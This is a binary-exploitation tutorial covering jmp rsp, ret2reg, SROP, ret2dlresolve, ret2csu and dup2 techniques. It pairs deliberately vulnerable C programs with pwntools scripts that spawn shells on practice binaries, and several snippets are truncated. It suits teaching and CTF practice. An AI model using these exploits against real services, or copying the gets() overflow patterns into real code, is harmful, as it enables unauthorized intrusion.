Utilising ROP
The problem with shellcode exploits as they are is that the location of the shellcode is
uncertain - wouldn't it be cool if we could control where we wrote it to?
Well, we can.
Instead of writing shellcode directly, we can instead use some ROP to take in input
again - except this time, we specify the location as somewhere we control.
Using ESP
If you think about it, once the return pointer is popped off the stack ESP will point at
whatever is after it in memory - after all, that's the entire basis of ROP. But what if we
put shellcode there?
It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return
pointer with a jmp esp gadget? Once it gets popped off, ESP will point at the
shellcode and thanks to the jmp esp it will be executed!
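The resulting payload layout is short enough to sketch by hand. Here the gadget address is a made-up placeholder, the 32 bytes of padding are an assumption borrowed from the other examples, and a few int3 bytes stand in for real shellcode.

```python
import struct

JMP_ESP = 0x080491F7     # hypothetical address of a jmp esp gadget
PADDING = 32             # assumed distance to the return pointer
shellcode = b"\xcc" * 4  # placeholder bytes, not real shellcode

payload = b"A" * PADDING + struct.pack("<I", JMP_ESP) + shellcode

# The shellcode begins immediately after the overwritten return pointer,
# which is exactly where ESP points once ret has popped the gadget address.
shellcode_start = PADDING + 4
print(shellcode_start, len(payload))
```

Note that this only works if the stack is executable, and the binary has to contain a usable jmp esp gadget in the first place.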
ret2reg
ret2reg extends the use of jmp esp to the use of any register that happens to point
somewhere you need it to.
Source
#include <stdio.h>
void vuln() {
char buffer[20];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Exploitation
Let's get all the basic setup done.
Now we're going to do something interesting - we are going to call gets again. Most
importantly, we will tell gets to write the data it receives to a section of the binary.
We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT
entry to gets , and when it receives the shellcode we send it will write the shellcode
into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the
return address of our call to gets to where we wrote the shellcode, perfectly
executing what we just inputted.
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of p
rop.raw(elf.got['puts']) # now our shellcode is written there, we c
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
Final Exploit
rop = ROP(elf)
rop.raw('A' * 32)
rop.gets(elf.got['puts']) # Call gets, writing to the GOT entry of p
rop.raw(elf.got['puts']) # now our shellcode is written there, we c
p.recvline()
p.sendline(rop.chain())
p.sendline(asm(shellcraft.sh()))
p.interactive()
64-bit
ASLR
No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.
The real problem would be if PIE was enabled, as then you couldn't call gets as the
location of the PLT would be unknown without a leak - same problem with writing to
the GOT.
Potential Problems
Thanks to clubby789 and Faith from the HackTheBox Discord server, I found out that
the GOT often has executable permissions simply because those are the default
permissions when there's no NX. If you have a more recent kernel, such as 5.9.0 , the
default is changed and the GOT will not have X permissions.
As such, if your exploit is failing, run uname -r to grab the kernel version and check if
it's 5.9.0 or newer; if it is, you'll have to find another RWX region to place your
shellcode (if it exists!).
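If you'd rather script that check than eyeball it, here's a minimal sketch. It treats 5.9.0 as the cut-off mentioned above and assumes later kernels behave the same way; kernel_at_least is a helper name I made up for illustration.

```python
import platform
import re

def kernel_at_least(release, minimum=(5, 9, 0)):
    """Compare a `uname -r` style string against a (major, minor, patch) tuple."""
    # Drop distro suffixes such as "-generic" before pulling out the numbers.
    numbers = [int(n) for n in re.findall(r"\d+", release.split("-")[0])]
    numbers += [0] * (3 - len(numbers))      # "6.1" is treated as 6.1.0
    return tuple(numbers[:3]) >= minimum

# platform.release() returns the same string as `uname -r` on Linux.
print(platform.release(), kernel_at_least(platform.release()))
```

If it prints True, don't count on the GOT being executable and go hunting for another region.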
Using RSP
Source
#include <stdio.h>
int test = 0;
int main() {
char input[100];
if(test) {
asm("jmp *%rsp");
return 0;
}
else {
return 0;
}
}
You can ignore most of it as it's mostly there to accommodate the existence of jmp rsp
- we don't actually want it called, so it sits behind an if statement that is never true.
The chances of jmp rsp gadgets existing in the binary are incredibly low, but what you
often do instead is find a sequence of bytes that encodes jmp rsp and jump there -
jmp rsp is \xff\xe4 in machine code, so if there is any part of the executable section with
bytes in this order, they can be used as if they were a jmp rsp .
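Hunting for those two bytes is easy to sketch. The snippet below is only an illustration: fake_text is a made-up byte string standing in for the executable section, and the base address is hypothetical. On a real binary you'd read the section out of the file (pwntools' elf.search does this kind of lookup for you).

```python
JMP_RSP = b"\xff\xe4"  # machine code for `jmp rsp`

def find_all(blob, needle=JMP_RSP, base=0):
    """Return the address of every occurrence of needle inside blob."""
    hits = []
    pos = blob.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = blob.find(needle, pos + 1)
    return hits

# Hypothetical executable bytes: the pair shows up inside unrelated instructions.
fake_text = b"\x90\x90\x48\xc7\xc0\xff\xe4\x00\x00\xc3\xff\xe4"
hits = find_all(fake_text, base=0x401000)
print([hex(h) for h in hits])
```

Any hit only counts if it lives in memory that is actually mapped executable.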
Exploitation
Try to do this yourself first, using the explanation on the previous page. Remember,
RSP points at the thing after the return pointer once ret has occurred, so your
shellcode goes after it.
Solution
payload = flat(
'A' * 120, # padding
jmp_rsp, # RSP will be pointing to shellcode, so we j
asm(shellcraft.sh()) # place the shellcode
)
p.sendlineafter('RSP!\n', payload)
p.interactive()
Limited Space
You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What
you can do in this scenario is make the shellcode after the RIP equivalent to something
like
sub rsp, 0x20
jmp rsp
Where 0x20 is the offset between the current value of RSP and the start of the buffer.
In the buffer itself, we put the main shellcode. Let's try that!
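To get a feel for how little space that stub needs, here's a rough sketch that hand-encodes it. pivot_stub is a name I made up, and the encodings are the plain ones I'd expect an assembler to emit; in practice you'd just let asm() from pwntools do it.

```python
import struct

def pivot_stub(offset):
    """Machine code for `sub rsp, offset; jmp rsp` on x86-64."""
    if 0 <= offset <= 0x7f:
        # Small offsets fit the sign-extended 8-bit immediate form.
        sub = b"\x48\x83\xec" + struct.pack("<B", offset)
    else:
        # Anything larger needs the 32-bit immediate form.
        sub = b"\x48\x81\xec" + struct.pack("<I", offset)
    return sub + b"\xff\xe4"  # jmp rsp

small = pivot_stub(0x20)
large = pivot_stub(128)
print(small.hex(), len(small))
print(large.hex(), len(large))
```

An offset of 0x20 costs 6 bytes, while 128 no longer fits in a signed byte and costs 9, so the size of the jump back matters when space is tight.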
pause()
p.sendlineafter('RSP!\n', payload)
p.interactive()
The 10 is just a placeholder. Once we hit the pause() , we attach with radare2 and
set a breakpoint on the ret , then continue. Once we hit it, we find the beginning of
the A string and work out the offset between that and the current value of RSP - it's
128 !
Solution
payload = asm(shellcraft.sh())
payload = payload.ljust(120, b'A')
payload += p64(jmp_rsp)
payload += asm('''
sub rsp, 128;
jmp rsp;
''') # 128 we found with r2
p.sendlineafter('RSP!\n', payload)
p.interactive()
We successfully pivoted back to our shellcode - and because all our addresses are
relative, it's completely reliable! ASLR beaten with pure shellcode.
This is harder with PIE as the location of jmp rsp will change, so you might have to leak
PIE base!
ret2reg
Using Registers to bypass ASLR
The reason RAX is the most common for this technique is that, by convention, the
return value of a function is stored in RAX. For example, take the following basic code:
#include <stdio.h>
int test() {
return 0xdeadbeef;
}
int main() {
test();
return 0;
}
As you can see, the value 0xdeadbeef is being moved into EAX.
Using ret2reg
Source
Any function that returns a pointer to the string once it acts on it is a prime target.
There are many that do this, including stuff like gets() , strcpy() and fgets() .
We'll keep it simple and use gets() as an example.
#include <stdio.h>
void vuln() {
char buffer[100];
gets(buffer);
}
int main() {
vuln();
return 0;
}
Analysis
First, let's make sure that some register does point to the buffer:
$ r2 -d -A vuln
Now we'll set a breakpoint on the ret in vuln() , continue and enter text .
[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d
We've hit the breakpoint, let's check if RAX points to our buffer. We'll assume RAX
first because that's the traditional register to use for the return value.
[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello
Exploitation
We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look
for either jmp rax or call rax :
There's a jmp rax at 0x40109c , so I'll use that. The padding up until RIP is 120 ; I
assume you can calculate this yourselves by now, so I won't bother showing it.
JMP_RAX = 0x40109c
p.sendline(payload)
p.interactive()
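For reference, here's how I'd expect the payload itself to be laid out, as a stdlib-only sketch. The gadget address and the 120 bytes of padding come from the text above; the shellcode is a placeholder (real shellcode would come from something like asm(shellcraft.sh())), and OFFSET_TO_RIP is just a name for illustration.

```python
import struct

JMP_RAX = 0x40109c       # gadget address quoted above
OFFSET_TO_RIP = 120      # padding quoted above

# Placeholder bytes standing in for real shellcode, so the sketch has no dependencies.
shellcode = b"\xcc" * 4

# RAX points at the start of the buffer, so the shellcode goes first.
payload = shellcode.ljust(OFFSET_TO_RIP, b"A")
# The saved return pointer is overwritten with the jmp rax gadget.
payload += struct.pack("<Q", JMP_RAX)
```

Since gets() stops at a newline, it's worth checking the final payload contains no \n bytes.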
Awesome!
The value of this variable is a pointer to the function that malloc uses whenever it
is called.
To summarise, when you call malloc() the function __malloc_hook points to also
gets called - so if we can overwrite this with, say, a one_gadget , and somehow trigger
a call to malloc() , we can get an easy shell.
Finding One_Gadgets
Luckily there is a tool written in Ruby called one_gadget . To install it, run:
gem install one_gadget
Then point it at the libc you're targeting:
one_gadget libc
For most one_gadgets, certain criteria have to be met. This means they won't all work - in
fact, none of them may work.
Triggering malloc()
Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you
can actually trigger malloc by calling printf("%10000$c") (this allocates too many
bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you
have a format string vulnerability, calling malloc is trivial.
Practise
This is a hard technique to give you practice on, due to the fact that your libc version
may not even have working one_gadgets . As such, feel free to play around with the
GOT overwrite binary and see if you can get a one_gadget working.
Remember, the value given by the one_gadget tool needs to be added to libc base as
it's just an offset.
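As a tiny worked example of that arithmetic (both numbers below are made up, and this only applies to libc versions that still have __malloc_hook , which newer glibc releases removed):

```python
import struct

libc_base = 0x7f1234560000    # hypothetical leaked libc base (page-aligned)
gadget_offset = 0x4f2c5       # hypothetical offset printed by one_gadget

# The tool prints an offset, so the real address is base + offset.
one_gadget = libc_base + gadget_offset
# These are the 8 bytes you would write over __malloc_hook.
hook_value = struct.pack("<Q", one_gadget)
print(hex(one_gadget))
```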
Syscalls
Interfacing directly with the kernel
Overview
A syscall is a system call, and is how the program enters the kernel in order to carry
out specific tasks such as creating processes, I/O and anything else that requires
kernel-level access.
Browsing the list of syscalls, you may notice that certain syscalls are similar to libc
functions such as open() , fork() or read() ; this is because these functions are
simply wrappers around the syscalls, making it much easier for the programmer.
Triggering Syscalls
On 64-bit Linux, a syscall is triggered by the syscall instruction (32-bit x86 uses
int 0x80 instead). Once it's executed, the kernel checks the value stored in RAX - this is
the syscall number, which defines what syscall gets run. As per the table, the other
parameters can be stored in RDI, RSI, RDX, etc. and every parameter has a different
meaning for the different syscalls.
Execve
A notable syscall is the execve syscall, which executes the program passed to it in RDI.
RSI and RDX hold argv and envp respectively.
This means, if there is no system() function, we can use execve to call /bin/sh
instead - all we have to do is pass in a pointer to /bin/sh to RDI, and populate RSI and
RDX with 0 (a NULL argv and envp is all we need to pop a shell).
The Source
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 300;
syscall;
ret;
pop rax;
ret;
pop rdi;
ret;
pop rsi;
ret;
pop rdx;
ret;
'''
)
elf.save('vuln')
The binary contains all the gadgets you need! First it executes a read syscall, writes to
the stack, then the ret occurs and you can gain control.
But what about the /bin/sh ? I slightly cheesed this one and couldn't be bothered to
add it to the assembly, so I just did:
Exploitation
RAX: 0x3b
RDI: pointer to /bin/sh
RSI: 0x0
RDX: 0x0
To get the address of the gadgets, I'll just do objdump -d vuln . The address of
/bin/sh can be gotten using strings:
The offset from the base to the string is 0x1250 ( -t x tells strings to print the
offset as hex). Armed with all this information, we can set up the constants:
POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015
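These constants can be sanity-checked without objdump by adding up instruction lengths from the source assembly. This is only a sketch under a few assumptions: the load address of 0x10000000 is inferred from the constants, the lengths are the usual encodings for these instructions, and the binsh line assumes the offset reported by strings maps straight onto the base.

```python
BASE = 0x10000000  # assumed load address; it matches the constants above

# (instruction, encoded length in bytes) in the order they were assembled
listing = [
    ("mov rdi, 0", 7), ("mov rsi, rsp", 3), ("sub rsi, 8", 4),
    ("mov rdx, 300", 7), ("syscall", 2), ("ret", 1),
    ("pop rax", 1), ("ret", 1), ("pop rdi", 1), ("ret", 1),
    ("pop rsi", 1), ("ret", 1), ("pop rdx", 1), ("ret", 1),
]

addresses = {}
cursor = BASE
for text, size in listing:
    addresses.setdefault(text, cursor)   # remember the first occurrence only
    cursor += size

binsh = BASE + 0x1250                    # string offset from the text above

for name in ("syscall", "pop rax", "pop rdi", "pop rsi", "pop rdx"):
    print(name, hex(addresses[name]))
print("binsh", hex(binsh))
```

The printed addresses line up with SYSCALL and the four POP constants, which is a decent sign nothing was misread.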
Now we just need to populate the registers. I'll tell you the padding is 8 to save time:
payload = flat(
'A' * 8,
POP_RAX,
0x3b,
POP_RDI,
binsh,
POP_RSI,
0x0,
POP_RDX,
0x0,
SYSCALL
)
p.sendline(payload)
p.interactive()
Sigreturn-Oriented Programming (SROP)
Controlling all registers at once
Overview
A sigreturn is a special type of syscall. The purpose of sigreturn is to return from the
signal handler and to clean up the stack frame after a signal has been unblocked.
What this involves is storing all the register values on the stack. Once the signal is
unblocked, all the values are popped back in (RSP points to the bottom of the sigreturn
frame, this collection of register values).
Exploitation
By leveraging a sigreturn , we can control all register values at once - amazing! Yet
this is also a drawback - we can't pick-and-choose registers, so if we don't have a stack
leak it'll be hard to set registers like RSP to a workable value. Nevertheless, this is a
super powerful technique - especially with limited gadgets.
Using SROP
Source
As with the syscalls, I made the binary using the pwntools ELF features:
from pwn import *
context.arch = 'amd64'
context.os = 'linux'
elf = ELF.from_assembly(
'''
mov rdi, 0;
mov rsi, rsp;
sub rsi, 8;
mov rdx, 500;
syscall;
ret;
pop rax;
ret;
''', vma=0x41000
)
elf.save('vuln')
It's quite simple - a read syscall, followed by a pop rax; ret gadget. You can't
control RDI/RSI/RDX, which you need to pop a shell, so you'll have to use SROP.
Exploitation
First let's plonk down the available gadgets and their location, as well as the location of
/bin/sh .
From here, I suggest you try the payload yourself. The padding (as you can see in the
assembly) is 8 bytes until RIP, then you'll need to trigger a sigreturn , followed by
the values of the registers.
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
Now the syscall looks at the location of RSP for the register values; we'll have to fake
them. They have to be in a specific order, but luckily for us pwntools has a cool feature
called a SigreturnFrame() that handles the order for us.
frame = SigreturnFrame()
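To see what "a specific order" means in practice, here's a rough stdlib-only sketch of an amd64 frame. The field order is the one I believe pwntools uses; treat the trailing fields in particular as an assumption. build_frame is a made-up helper, the rdi value is a hypothetical address for /bin/sh , and rip assumes the syscall gadget sits 0x15 bytes into a binary loaded at 0x41000.

```python
import struct

# Assumed field order of the amd64 signal frame, 8 bytes per field.
FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "&fpstate", "__reserved", "sigmask",
]

def build_frame(**regs):
    """Pack a fake frame; every field not named in regs is zero."""
    unknown = set(regs) - set(FIELDS)
    if unknown:
        raise KeyError(f"unknown frame fields: {sorted(unknown)}")
    values = {name: 0 for name in FIELDS}
    values["csgsfs"] = 0x33              # user-mode code segment selector
    values.update(regs)
    return b"".join(struct.pack("<Q", values[name]) for name in FIELDS)

# Hypothetical execve("/bin/sh", NULL, NULL) frame.
frame = build_frame(rax=0x3b, rdi=0x41430, rsi=0, rdx=0, rip=0x41015)
print(len(frame), hex(FIELDS.index("rax") * 8), hex(FIELDS.index("rip") * 8))
```

Every register you don't set ends up as zero after the sigreturn, RSP included, which is why a stack leak matters if you need to keep going afterwards.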
Now we just need to decide what the register values should be. We want to trigger an
execve() syscall, so we'll set the registers to the values we need for that:
However, in order to trigger this we also have to control RIP and point it back at the
syscall gadget, so the execve actually executes:
frame.rip = SYSCALL_RET
payload += bytes(frame)
p.sendline(payload)
p.interactive()
Final Exploit
frame = SigreturnFrame()
frame.rax = 0x3b # syscall number for execve
frame.rdi = BINSH # pointer to /bin/sh
frame.rsi = 0x0 # NULL
frame.rdx = 0x0 # NULL
frame.rip = SYSCALL_RET
payload = b'A' * 8
payload += p64(POP_RAX)
payload += p64(0xf)
payload += p64(SYSCALL_RET)
payload += bytes(frame)
p.sendline(payload)
p.interactive()
ret2dlresolve
Resolving our own libc functions
Broad Overview
During a ret2dlresolve, the attacker tricks the binary into resolving a function of its
choice (such as system ) into the PLT. This then means the attacker can use the PLT
function as if it was originally part of the binary, bypassing ASLR (if present) and
requiring no libc leaks.
Detailed Overview
Dynamically-linked ELF objects import libc functions when they are first called using
the PLT and GOT. During the relocation of a runtime symbol, RIP will jump to the PLT
and attempt to resolve the symbol. During this process a "resolver" is called.
For all these screenshots, I broke at read@plt . I'm using GDB with the pwndbg plugin as
it shows it a bit better.
The PLT jumps to wherever the GOT points. Originally, before the GOT is updated, it
points back to the instruction after the jmp in the PLT to resolve it.
In order to resolve the functions, there are 3 structures that need to exist within the
binary. Faking these 3 structures could enable us to trick the linker into resolving a
function of our choice, and we can also pass parameters in (such as /bin/sh ) once
resolved.
Structures
There are 3 structures we need to fake.
$ readelf -d source
JMPREL
The JMPREL segment ( .rel.plt ) stores the Relocation Table, which maps each
entry to a symbol.
$ readelf -r source
The column name corresponds to our symbol name. The offset is the GOT entry for
our symbol. info stores additional metadata.
STRTAB
SYMTAB
typedef struct
{
    Elf32_Word    st_name;   /* Symbol name (string tbl index) */
    Elf32_Addr    st_value;  /* Symbol value */
    Elf32_Word    st_size;   /* Symbol size */
    unsigned char st_info;   /* Symbol type and binding */
    unsigned char st_other;  /* Symbol visibility under glibc>=2.2 */
    Elf32_Section st_shndx;  /* Section index */
} Elf32_Sym;
The most important value here is st_name as this gives the offset in STRTAB of the
symbol name. The other fields are not relevant to the exploit itself.
Here we're reading SYMTAB + R_SYM * size (16) , and it appears that the offset (the
SYMTAB st_name variable) is 0x10 .
Let's hop back to the GOT and PLT for a slightly more in-depth look.
If the GOT entry is unpopulated, we push the reloc_offset value and jump to the
beginning of the .plt section. A few instructions later, the dl-resolve() function is
called, with reloc_offset being one of the arguments. It then uses this
reloc_offset to calculate the relocation and symtab entries.
Resources
The Original Phrack Article
0ctf's babystack
rk700 (in Chinese)
Exploitation
Source
To display an example program, we will use the example given on the pwntools entry
for ret2dlresolve:
#include <unistd.h>
void vuln(void){
char buf[64];
read(STDIN_FILENO, buf, 200);
}
int main(int argc, char** argv){
vuln();
}
Exploitation
pwntools contains a fancy Ret2dlresolvePayload that can automate the majority of
our exploit:
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to w
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve()
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and
Now we know where the fake structures are placed. Since I ran the script with the
DEBUG parameter, I'll check what gets sent.
00000000 73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00 │syst│em·a
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08 │····│····
00000020 07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a │····│/bin
0000002d
system is being written to 0x804ce00 - as the debug said the Symbol name addr
would be placed
After that, at 0x804ce0c , the Elf32_Sym struct starts. First it contains the table
index of that string, which in this case is 0x4ba4 as it is a very long way off the
actual table. Next it contains the other values on the struct, but they are irrelevant
and so zeroed out.
At 0x804ce1c the Elf32_Rel struct starts; first it contains the address of the
system string, 0x0804ce00 , then the r_info variable - if you remember this
specifies the R_SYM , which is used to link the SYMTAB and the STRTAB .
After all the structures we place the string /bin/sh at 0x804ce24 - which, if you
remember, was the argument passed to system when we printed the rop.dump() :
Final Exploit
rop.raw('A' * 76)
rop.read(0, dlresolve.data_addr) # read to where we want to write the fak
rop.ret2dlresolve(dlresolve) # call .plt and dl-resolve() with the co
log.info(rop.dump())
p.sendline(rop.chain())
p.sendline(dlresolve.payload) # now the read is called and we pass all
p.interactive()
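If you want to double-check the walkthrough of the fake structures, the bytes from the DEBUG hexdump can be unpacked with nothing but the standard library. This is just a sketch: the byte values are copied from the dump above, and the offsets 0x0c , 0x1c and 0x24 are the struct positions described in the text.

```python
import struct

# Bytes copied from the DEBUG hexdump (0x2d bytes, written at 0x804ce00).
rows = [
    "73 79 73 74 65 6d 00 61 63 61 61 61 a4 4b 00 00",
    "00 00 00 00 00 00 00 00 00 00 00 00 00 ce 04 08",
    "07 c0 04 00 2f 62 69 6e 2f 73 68 00 0a",
]
blob = bytes.fromhex(" ".join(rows))

# Symbol name string, NUL-terminated, at the very start.
name = blob[:blob.index(b"\x00")]

# Elf32_Sym (16 bytes) at offset 0x0c.
st_name, st_value, st_size, st_info, st_other, st_shndx = struct.unpack_from(
    "<IIIBBH", blob, 0x0c
)

# Elf32_Rel (8 bytes) at offset 0x1c; r_info packs the symbol index and type.
r_offset, r_info = struct.unpack_from("<II", blob, 0x1c)
r_sym, r_type = r_info >> 8, r_info & 0xff

# Argument string at offset 0x24.
arg = blob[0x24:blob.index(b"\x00", 0x24)]

print(name, hex(st_name), hex(r_offset), hex(r_sym), r_type, arg)
```

The low byte of r_info comes out as 7, the jump-slot relocation type on 32-bit x86, and the upper bits are the (deliberately huge) symbol index.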
ret2csu
Controlling registers when gadgets are lacking
ret2csu is a technique for populating registers when there is a lack of gadgets. More
information can be found in the original paper, but a summary is as follows:
When an application is dynamically linked (compiled with libc linked to it), there is a
selection of functions it contains to allow the linking. These functions contain within
them a selection of gadgets that we can use to populate registers we lack gadgets for,
most importantly __libc_csu_init , which contains the following two gadgets:
The second might not look like a gadget, but if you look it calls r15 + rbx*8 . The first
gadget chain allows us to control both r15 and rbx in that series of huge pop
operations, meaning we can control where the second gadget calls afterwards.
Note it's call qword [r15 + rbx*8] , not call qword r15 + rbx*8 . This means it'll
calculate r15 + rbx*8 then go to that memory address, read it, and call that value.
This means we have to find a memory address that contains where we want to jump.
These gadget chains allow us, despite an apparent lack of gadgets, to populate the RDX
and RSI registers (which are important for parameters) via the second gadget, then
jump wherever we wish by simply controlling r15 and rbx to workable values.
This means we can potentially pull off syscalls for execve , or populate parameters for
functions such as write() .
You may wonder why we would do something like this if we're linked to libc - why not just
read the GOT? Well, some functions - such as write() - take three parameters (and need at
least two of them set), so we would require ret2csu to populate them if there was a lack
of gadgets.
Exploitation
Source
#include <stdio.h>
int main() {
puts("Come on then, ret2csu me");
char input[30];
gets(input);
return 0;
}
Obviously, you can do a ret2plt followed by a ret2libc, but that's really not the point of
this. Try calling win() , and to do that you have to populate the register rdx . Try what
we've talked about, and then have a look at the answer if you get stuck.
Analysis
We can work out the addresses of the massive chains using r2, and chuck this all into
pwntools.
[...]
0x00401208 4c89f2 mov rdx, r14
0x0040120b 4c89ee mov rsi, r13
0x0040120e 4489e7 mov edi, r12d
0x00401211 41ff14df call qword [r15 + rbx*8]
0x00401215 4883c301 add rbx, 1
0x00401219 4839dd cmp rbp, rbx
0x0040121c 75ea jne 0x401208
0x0040121e 4883c408 add rsp, 8
0x00401222 5b pop rbx
0x00401223 5d pop rbp
0x00401224 415c pop r12
0x00401226 415d pop r13
0x00401228 415e pop r14
0x0040122a 415f pop r15
0x0040122c c3 ret
Note I'm not popping RBX, despite the call . This is because RBX ends up being 0
anyway, and you want to mess with as few registers as you can to give the exploit
the best chance of success.
Exploitation
Finding a win()
Now we need to find a memory location that has the address of win() written into it
so that we can point r15 at it. I'm going to opt to call gets() again instead, and then
input the address. The location we input to is a fixed location of our choice, which is
reliable. Now we just need to find a location.
To do this, I'll run r2 on the binary then dcu main to continue until main. Now let's
check permissions:
[0x00401199]> dm
0x0000000000400000 - 0x0000000000401000 - usr 4K s r--
0x0000000000401000 - 0x0000000000402000 * usr 4K s r-x
0x0000000000402000 - 0x0000000000403000 - usr 4K s r--
0x0000000000403000 - 0x0000000000404000 - usr 4K s r--
0x0000000000404000 - 0x0000000000405000 - usr 4K s rw-
RW_LOC = 0x00404028
Reading in win()
rop.raw('A' * 40)
rop.gets(RW_LOC)
Now we have the address written there, let's just get the massive ropchain and plonk it
all in
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
Sending it off
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work
Final Exploit
from pwn import *
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0) # r12
rop.raw(0) # r13
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win'])) # send to gets() so it's writt
print(p.recvline()) # should receive "Awesome work
Simplification
As you probably noticed, we don't need to pop off r12 or r13, so we can move
POP_CHAIN a couple of instructions along:
rop = ROP(elf)
rop.raw('A' * 40)
rop.gets(RW_LOC)
rop.raw(POP_CHAIN)
rop.raw(0xdeadbeefcafed00d) # r14 - popped into RDX!
rop.raw(RW_LOC) # r15 - holds location of called function
rop.raw(REG_CALL) # all the movs, plus the call
p.sendlineafter('me\n', rop.chain())
p.sendline(p64(elf.sym['win']))
print(p.recvline())
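To make the difference between the two versions concrete, here's a stdlib-only sketch of just the ret2csu tail of each chain (the padding and the gets() call are left out). The addresses are read off the __libc_csu_init disassembly earlier; the names POP_R12_CHAIN and POP_R14_CHAIN are mine, standing for the two values POP_CHAIN takes.

```python
import struct

def p64(value):
    """Pack a 64-bit little-endian value, like pwntools' p64."""
    return struct.pack("<Q", value)

POP_R12_CHAIN = 0x401224   # pop r12; pop r13; pop r14; pop r15; ret
POP_R14_CHAIN = 0x401228   # pop r14; pop r15; ret (skips two 2-byte pops)
REG_CALL = 0x401208        # mov rdx, r14; ...; call qword [r15 + rbx*8]
RW_LOC = 0x404028          # writable address that holds the pointer to call
RDX_VALUE = 0xdeadbeefcafed00d

# Original chain: r12 and r13 are filled with zeroes we don't care about.
full = b"".join(map(p64, [POP_R12_CHAIN, 0, 0, RDX_VALUE, RW_LOC, REG_CALL]))
# Simplified chain: start at pop r14, so the two junk values disappear.
short = b"".join(map(p64, [POP_R14_CHAIN, RDX_VALUE, RW_LOC, REG_CALL]))

print(len(full), len(short))
```

Skipping the two pops saves 16 bytes, which can matter when the overflow is small.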
Overview
File Descriptors are integers that represent connections to sockets or files or whatever
you're connecting to. In Unix systems, there are 3 main file descriptors (often
abbreviated fd) for each application:
Name fd
stdin 0
stdout 1
stderr 2
These are, as shown above, standard input, output and error. You've probably used
them before yourself, for example to hide errors when running commands:
p = process()
p = remote(host, port)
The reason for this is every new connection has a different fd. If you listen in C, since
fds 0-2 are reserved, the listening socket will often be assigned fd 3 . Once we connect,
we set up another fd, fd 4 (neither the 3 nor the 4 is certain, but statistically likely).
Here we have to tell the program to duplicate the file descriptor in order to redirect
stdin and stdout to fd 4 , and glibc provides a simple way to do so.
The dup syscall (and C function) duplicates the fd and uses the lowest-numbered free
fd for the copy. However, we need to choose exactly which fds end up pointing at fd 4
(0 and 1), so we can use dup2() . dup2 takes in two parameters: an oldfd and a
newfd , in that order. Descriptor oldfd is duplicated to newfd , allowing us to
interact with stdin and stdout and actually use any shell we may have popped.
Note that the man page outlines how if newfd is in use it is silently closed, which is
exactly what we wish.
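Python's os.dup2 takes the same two arguments in the same order, so the behaviour is easy to try out locally. In this sketch a pipe stands in for the network socket and a handle on /dev/null stands in for the original stdout; neither is part of the challenge, they just make the effect visible.

```python
import os

# write_end plays the role of the socket (fd 4 in the text).
read_end, write_end = os.pipe()
# target plays the role of the descriptor we want to redirect (stdout).
target = os.open(os.devnull, os.O_WRONLY)

# dup2(oldfd, newfd): target's old file is silently closed,
# and target now refers to the same pipe as write_end.
os.dup2(write_end, target)

os.write(target, b"hello")        # lands in the pipe, not in /dev/null
received = os.read(read_end, 5)
print(received)

for fd in (read_end, write_end, target):
    os.close(fd)
```

In the exploit the same thing happens with oldfd set to 4 and newfd set to 0 and then 1.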
Exploit
Duplicating the Descriptors
Source
I'll include source.c , but most of it is socket programming derived from here. The two
relevant functions - vuln() and win() - I'll list below.
void win() {
system("/bin/sh");
}
Exploitation
Start the binary with ./vuln 9001 .
Testing Offset
payload = b'AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUA
pause()
p.sendline(payload)
Once the pause() is reached, I hook on with radare2 and set a breakpoint at the ret .
$ r2 -d -A $(pidof vuln)
[0x7f741033bdee]> db 0x0040126b
[0x7f741033bdee]> dc
hit breakpoint at: 40126b
Generate Exploit
payload = flat(
'A' * 40,
elf.sym['win']
)
p.sendline(payload)
p.interactive()
A shell was popped there! This is the file descriptor issue we talked about before.
I've simplified this challenge a lot by including a call to dup2() within the vulnerable
binary, but normally you would leak libc via the GOT and then use libc's dup2() rather
than the PLT; this walkthrough is about the basics, so I kept it as simple as possible.
Using dup2()
